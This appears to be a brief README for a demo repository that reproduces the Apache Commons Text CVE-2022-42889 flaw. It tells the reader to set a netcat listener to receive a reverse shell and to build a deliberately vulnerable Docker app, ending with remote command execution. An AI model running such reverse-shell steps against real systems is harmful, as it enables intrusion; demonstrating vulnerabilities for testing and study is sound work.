This repository contains a simple application using Apache Commons Text < 1.10 which is vulnerable to CVE-2022-42889.
Replace DemoApplication.java
nc command by your host ip address.
Listening with netcat:
$ nc -l -p 30000
Build and run docker vulnerable code
docker build . -t vulnerable-app
docker run vulnerable-app
As you can see netcat will be able to execute remote commands